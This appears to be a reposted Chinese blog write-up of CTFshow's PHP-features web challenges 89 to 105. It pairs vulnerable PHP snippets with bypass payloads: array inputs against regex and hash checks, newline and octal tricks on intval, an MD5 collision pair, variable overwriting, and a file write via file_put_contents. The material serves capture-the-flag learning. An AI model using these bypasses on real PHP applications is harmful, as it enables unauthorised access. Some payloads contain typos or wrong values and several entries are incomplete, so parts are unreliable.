2. 程式人生 > 實用技巧 >CTFshow web入門 (php特性)

CTFshow web入門 (php特性)

阿新 發佈:2020-10-11

web 89

<?php


include("flag.php");
highlight_file(__FILE__);

if(isset($_GET['num'])){
    $num = $_GET['num'];
    if(preg_match("/[0-9]/", $num)){
        die("no no no!");
    }
    if(intval($num)){
        echo $flag;
    }
}

構造陣列繞過即可

payload:?mun[]=1

web 90

web 91

<?php

show_source(__FILE__);
include('flag.php');
$a=$_GET['cmd'];
if(preg_match('/^php$/im', $a)){
    if(preg_match('/^php$/i', $a)){
        echo 'hacker';
    }
    else{
        echo $flag;
    }
}
else{
    echo 'nonononono';
}

 
/i  表示匹配的時候不區分大小寫

/m 表示多行匹配,什麼是多行匹配呢?就是匹配換行符兩端的潛在匹配。影響正則中的^$符號

這裡主要的突破點就是/m,我們可以看到第一個preg_match()函式,有個/m,而第二個正則則沒有,我們可以利用換行進行繞過

payload:?cmd=%0aphp

注:%0a是換行的意思

web 92

和web90是一樣的

payload:?num=0x117c

web 93

<?php
include("flag.php");
highlight_file(__FILE__);
if(isset($_GET['num'])){
    $num = $_GET['num'];
    if($num==4476){
        die("no no no!");
    }
    if(preg_match("/[a-z]/i", $num)){
        die("no no no!");
    }
    if(intval($num,0)==4476){
        echo $flag;
    }else{
        echo intval($num,0);
    }
}

過濾了字母,十六進位制弄不了,那就改八進位制

payload:?num=010574

4476的八進位制為10574

web 94

<?php

include("flag.php");
highlight_file(__FILE__);
if(isset($_GET['num'])){
    $num = $_GET['num'];
    if($num==="4476"){
        die("no no no!");
    }
    if(preg_match("/[a-z]/i", $num)){
        die("no no no!");
    }
    if(!strpos($num, "0")){
        die("no no no!");
    }
    if(intval($num,0)===4476){
        echo $flag;
    }
}

strpos()

對於strpos()函式,我們可以利用換行進行繞過(%0a)

payload:?num=%0a010574

也可以小數點繞過

payload:?num=4476.0

因為intval()函式只讀取整數部分

還可以八進位制繞過(%20是空格的url編碼形式)

payload:?num=%20010576

web 95

<?php

include("flag.php");
highlight_file(__FILE__);
if(isset($_GET['num'])){
    $num = $_GET['num'];
    if($num==4476){
        die("no no no!");
    }
    if(preg_match("/[a-z]|\./i", $num)){
        die("no no no!!");
    }
    if(!strpos($num, "0")){
        die("no no no!!!");
    }
    if(intval($num,0)===4476){
        echo $flag;
    }
}

八進位制繞過

payload:?num=%20010576

Payload: ?num=+010574

web 96

<?php

highlight_file(__FILE__);

if(isset($_GET['u'])){
    if($_GET['u']=='flag.php'){
        die("no no no");
    }else{
        highlight_file($_GET['u']);
    }


}

paylaod:?u=./flag.php

意思就是說顯示當前目錄下的flag.php檔案

web 97

<?php


include("flag.php");
highlight_file(__FILE__);
if (isset($_POST['a']) and isset($_POST['b'])) {
if ($_POST['a'] != $_POST['b'])
if (md5($_POST['a']) === md5($_POST['b']))
echo $flag;
else
print 'Wrong.';
}
?>

md5碰撞

payload: a=%4d%c9%68%ff%0e%e3%5c%20%95%72%d4%77%7b%72%15%87%d3%6f%a7%b2%1b%dc%56%b7%4a%3d%c0%78%3e%7b%95%18%af%bf%a2%00%a8%28%4b%f3%6e%8e%4b%55%b3%5f%42%75%93%d8%49%67%6d%a0%d1%55%5d%83%60%fb%5f%07%fe%a2&b=%4d%c9%68%ff%0e%e3%5c%20%95%72%d4%77%7b%72%15%87%d3%6f%a7%b2%1b%dc%56%b7%4a%3d%c0%78%3e%7b%95%18%af%bf%a2%02%a8%28%4b%f3%6e%8e%4b%55%b3%5f%42%75%93%d8%49%67%6d%a0%d1%d5%5d%83%60%fb%5f%07%fe%a2

payload:a[]=1&b[]=1

web 98

<?php

include("flag.php");
$_GET?$_GET=&$_POST:'flag';  
$_GET['flag']=='flag'?$_GET=&$_COOKIE:'flag';
$_GET['flag']=='flag'?$_GET=&$_SERVER:'flag';
highlight_file($_GET['HTTP_FLAG']=='flag'?$flag:__FILE__);

?>

稀裡糊塗的就出flag了,講下大概思路

主要是三元運算子和變數覆蓋

$_GET?$_GET=&$_POST:'flag'; 意思就是說如果存在GET請求,則將POAT請求覆蓋掉GET請求

highlight_file($_GET['HTTP_FLAG']=='flag'?$flag: __FILE __); 意思就是說GET傳參HTTP_FLAG的值為flag,則讀取flag?

所以我就構造了GET:?flag=123

POST:HTTP_FLAG=flag

然後就得到了flag

web 99

<?php

highlight_file(__FILE__);
$allow = array();
for ($i=36; $i < 0x36d; $i++) { 
    array_push($allow, rand(1,$i));
}
if(isset($_GET['n']) && in_array($_GET['n'], $allow)){
    file_put_contents($_GET['n'], $_POST['content']);
}

?>

之後在cat flag36d.php即可

web 100

web 104

<?php

highlight_file(__FILE__);
include("flag.php");

if(isset($_POST['v1']) && isset($_GET['v2'])){
    $v1 = $_POST['v1'];
    $v2 = $_GET['v2'];
    if(sha1($v1)==sha1($v2)){
        echo $flag;
    }
}

?>

類似md5碰撞

payload:

GET:v2=1

POST: v1[]=2

web 105

<?php

highlight_file(__FILE__);
include('flag.php');
error_reporting(0);
$error='你還想要flag嘛?';
$suces='既然你想要那給你吧!';
foreach($_GET as $key => $value){
    if($key==='error'){
        die("what are you doing?!");
    }
    $$key=$$value;
}foreach($_POST as $key => $value){
    if($value==='flag'){
        die("what are you doing?!");
    }
    $$key=$$value;
}
if(!($_POST['flag']==$flag)){
    die($error);
}
echo "your are good".$flag."\n";
die($suces);

?>

先放payload:

foreach($_GET as $key => $value){
    if($key==='error'){
        die("what are you doing?!");
    }
    $$key=$$value;
//這是一步變數覆蓋,我們傳入suces=flag,最終會得到
//$suces=$flag,就是說將flag賦值給了suces變數

我們可以看到在只有GET請求的時候,報的是error錯誤,這也就說明我們只要將flag賦值給error變數即可

foreach($_POST as $key => $value){
    if($value==='flag'){
        die("what are you doing?!");
    }
    $$key=$$value;
}
//我們POST傳入error=suces,最終得到$error=$suces,結合GET請求,推出$error=$flag,即成功將flag的值賦值給了error變數

相關推薦

CTFshow web入門 (php特性

web 89 <?php include(\"flag.php\"); highlight_file(__FILE__); if(isset($_GET[\'num\'])){ $num = $_GET[\'num\'];

Ctfshow Web入門 - PHP特性(待續

Web89 include(\"flag.php\"); highlight_file(__FILE__); if(isset($_GET[\'num\'])){ $num = $_GET[\'num\']; if(preg_match(\"/[0-9]/\", $num)){

CTFSHOW WEB入門 PHP特性

web89 <?php /* # -*- coding: utf-8 -*- # @Author: h1xa # @Date:2020-09-16 11:25:09 # @Last Modified by:h1xa

ctfshowWeb入門 PHP特性 89-95

Web89 include(\"flag.php\"); highlight_file(__FILE__); if(isset($_GET[\'num\'])){ $num = $_GET[\'num\']; if(preg_match(\"/[0-9]/\", $num)){

CTFshowWeb入門-php特性(89-101) wp

前言 感覺瞭解php特性是基礎,所以決定先做這部分。 Web89(preg_match和intval 兩步,繞過正則,intval不為0。採取傳入陣列的方式繞過:

ctfshow Web入門 40 - 命令執行(10

題目過濾如下: 先檢視當前目錄下面有啥檔案 參考了羽大佬的WP:https://blog.csdn.net/miuzzx/article/details/108415301

ctfshow web入門 - 命令執行(50

if(isset($_GET[\'c\'])){ $c=$_GET[\'c\']; if(!preg_match(\"/\\;|cat|flag| |[0-9]|\\\\$|\\*|more|less|head|sort|tail|sed|cut|awk|strings|od|curl|\\`|\\%|\\x09|\\x26/i\", $c)){

CTFShow-Web入門-命令執行 29-36

web29 error_reporting(0); if(isset($_GET[\'c\'])){ $c = $_GET[\'c\']; if(!preg_match(\"/flag/i\", $c)){ eval($c);

CTFShow-Web入門-命令執行 37-49

data:// 用法:data://text/plain;base64, web37 error_reporting(0); if(isset($_GET[\'c\'])){ $c = $_GET[\'c\'];

CTFShow-Web入門-命令執行 71-74

web71 payload:c=include(\"/flag.txt\");exit(); 執行完前面的包含語句後會強制退出,不會執行後面的語句

Ctfshow Web入門 - 檔案包含總結

1.普通檔案包含 常見的php偽協議大致四種 1.php://filter主要用於讀取原始碼 2.php://input經常使用file_get_contents獲取php://input內容

ctfshow web入門 web57

膜 看wp分析一波 只要湊出36即可 0x01 shell中各種括號()、(())、[]、[[]]、{}的作用和區別 : https://blog.csdn.net/qq_46091464/article/details/108563368

ctfshow web入門 反序列化

技術標籤:CTFwebphp 文章目錄 web254web255web256web257web258web259web260 web254 <?php error_reporting(0);

CTFshow-WEB入門-反序列化(持續更新)

技術標籤:序列化和反序列化PHP反序列化web安全 前言 簡單的反序列化直接給出payload,有意思的,較為複雜的和我不太會的會分析一波。

ctfshow WEB入門 命令執行 web29-web122

web29 題目原始碼: if(isset($_GET[\'c\'])){ $c = $_GET[\'c\']; if(!preg_match(\"/flag/i\", $c)){ eval($c);

ctfshow_web入門 PHP特性——學習

PHP特性 這裡以半做題,半學習為主,所以就顯得比較囉嗦 阿巴阿巴,但是實際上,寫得比較水,等過一段時間再總結一下

ctfshow-web入門命令執行-web40/web41(附python指令碼)

web40 別看這裡過濾了這麼多,其實他過濾的括號是中文括號,這裡我開始納悶了好久

ctfshow web入門 命令執行

web32 <?php /* # -*- coding: utf-8 -*- # @Author: h1xa # @Date:2020-09-04 00:12:34 # @Last Modified by:h1xa

ctfshow web入門資訊收集

資訊收集 web1 檢視原始碼: 1.右鍵,檢視原始碼 2.view-source:url web2 view-source:url檢視原始碼

ctfshow WEB入門 資訊收集 1-20

web1 題目:開發註釋未及時刪除 檢視頁面原始碼即可 web2 題目:js把滑鼠右鍵和f12遮蔽了